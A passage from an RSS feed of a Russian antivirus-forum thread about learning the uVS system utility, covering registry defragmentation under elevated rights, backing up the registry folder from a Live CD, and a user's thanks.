			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message108553/</guid>
			<pubDate>Wed, 11 Mar 2020 22:24:40 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message108551/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Александр Sherr<br />В uVS есть возможность дефрагментации реестра.<br />Запустить с максимальными правами &nbsp;( Запустить под LocalSystem ( максимальные права, без доступа к сети )<br />Файл &gt; Дефрагментация реестра.<br />И где нибудь раз в квартал можно запускать. ( чаще не стоит )<br />Может поднять скорость работы с реестром, как системных так и сторонних программ.<br />Копию с помощью uVS делать не советую лучше применять спец софт или самостоятельно копировать с Live CD<br />C:\Windows\System32\config &nbsp; файлы каталог с реестром. <br />
			<i>11.03.2020 17:30:42, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message108551/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message108551/</guid>
			<pubDate>Wed, 11 Mar 2020 17:30:42 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message108550/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_c5jixZ4m" href="/user/997/" bx-tooltip-user-id="997">RP55 RP55</a> написал:<br />Что всё ?<br />=============<br />Та нет)) эта информация очень интересная для меня. Стараюсь ее по немного усваивать.<br /> Я имел ввиду, что буду опять обращаться по поводу чистки и решения каких-то проблем, с которыми не смогу справиться, когда буду чистить свой старый ноутбук))) <br />
			<i>11.03.2020 17:01:15, Александр Sherr.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message108550/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message108550/</guid>
			<pubDate>Wed, 11 Mar 2020 17:01:15 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
	</channel>
</rss>
